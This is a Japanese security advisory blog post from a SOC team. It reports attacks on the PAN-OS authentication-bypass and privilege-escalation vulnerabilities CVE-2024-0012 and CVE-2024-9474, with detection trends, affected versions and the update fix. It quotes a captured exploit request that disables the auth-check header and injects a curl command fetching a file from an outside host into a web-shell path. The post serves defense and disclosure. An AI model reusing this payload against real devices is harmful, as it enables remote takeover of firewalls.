本サイトは、快適にご利用いただくためにクッキー(Cookie)を使用しております。
Cookieの使用に同意いただける場合は「同意する」ボタンを押してください。
なお本サイトのCookie使用については、「個人情報保護方針」をご覧ください。

最新情報

2024.12.13

2024年11月度 MBSD-SOCの検知傾向トピックス

著者:MBSD-SOC

PAN-OSの認証回避・特権昇格の脆弱性(CVE-2024-0012, CVE-2024-9474)を狙った攻撃

 今月は、Palo Alto Networks社のPAN-OSにおける認証回避・特権昇格の脆弱性(CVE-2024-0012, CVE-2024-9474)を狙った攻撃を新たに観測しました。

 本脆弱性は、11/18(月)に公開されたもので、攻撃者に悪用された場合はリモートから管理者権限を取得され、設定変更など任意のコードを実行されてしまう恐れがあります。本脆弱性のCVSS値(脆弱性の深刻度)は、CVE-2024-0012は9.8、CVE-2024-9474は7.2と高い値になっています。当該製品を使用されている場合は、早急に最新のバージョンにアップデートすることをお勧めします。

 下図は、本脆弱性を狙った攻撃の検知数推移です。弊社SOCでは11/22(金)に初観測しており、11/25(月)に攻撃が急増しました。なお、攻撃元国の大多数(96.5%)は、ロシアからの攻撃となっておりました。

図. CVE-2024-0012, CVE-2024-9474の脆弱性を狙った攻撃の検知数推移
Graph202411.png

 以下は、弊社SOCで検知した攻撃例です。X-PAN-AUTHCHECKヘッダをOFFにすることにより認証を回避し、コマンド実行を試みた通信となっています。

図. CVE-2024-0012, CVE-2024-9474の脆弱性を狙った攻撃例

POST /php/utils/createRemoteAppwebSession.php/watchTowr.js.map HTTP/1.1
Host: www.example.co.jp
User-Agent: python-requests/2.32.3
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
X-PAN-AUTHCHECK: off
Content-Type: application/x-www-form-urlencoded
Content-Length: 152

user=`curl+http://xx.xx.xx.xx/palowin.php+>+/var/appweb/htdocs/unauth/watchTowr.php`&userRole=superuser&remoteHost=&vsys=vsys1

影響対象

  • PAN-OS 11.2.4-h1 未満の 11.2 系
  • PAN-OS 11.1.5-h1 未満の 11.1 系
  • PAN-OS 11.0.6-h1 未満の 11.0 系
  • PAN-OS 10.2.12-h2 未満の 10.2 系
  • PAN-OS 10.1.14-h6 未満の 10.1 系

対策方法

最新のバージョンにアップデートしてください。

参考情報

マネージドサービス事業部
MBSD-SOC